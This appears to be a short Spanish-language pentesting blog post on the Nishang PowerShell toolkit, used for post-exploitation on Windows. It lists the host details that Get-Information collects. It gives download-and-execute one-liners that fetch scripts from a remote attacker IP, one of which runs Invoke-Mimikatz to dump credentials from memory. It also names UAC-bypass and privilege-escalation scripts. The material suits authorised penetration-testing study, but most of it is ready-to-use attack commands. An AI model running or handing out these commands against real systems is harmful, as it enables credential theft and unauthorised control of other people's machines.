Hasta ahora en mi blog me habia limitado a usar Nishang sobretodo como reverse shell pero me estoy dando cuenta que tiene más aplicaciones.
Un ejemplo es Get-information que extrae automaticamente
- Powershell environment:
- Putty trusted hosts:
- Putty saved sessions:
- Recently used commands:
- Shares on the machine:
- Environment variables:
- More details for current user:
- SNMP community strings:
- SNMP community strings for current user:
- Installed Applications:
- Installed Applications for current user:
- Domain Name:
- Contents of /etc/hosts:
- Running Services:
- Account Policy:
- Local users:
- Local Groups:
- WLAN Info:
Para ejecutarlo solo necesitas:
iex (New-Object Net.WebClient).DownloadString('http://IP/Get-Information.ps1'); Get-Information
Podemos usar Mimikatz para extraer passwords de la memoria
iex (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz’); InvokeMimikatz -DumpCreds
Nishang igual puede como priv esc:
Enable-DuplicateToken.ps1
Invoke-PsUACme.ps1
Remove-Update.ps1
Como extra y esto no es nishang podemos usar powerup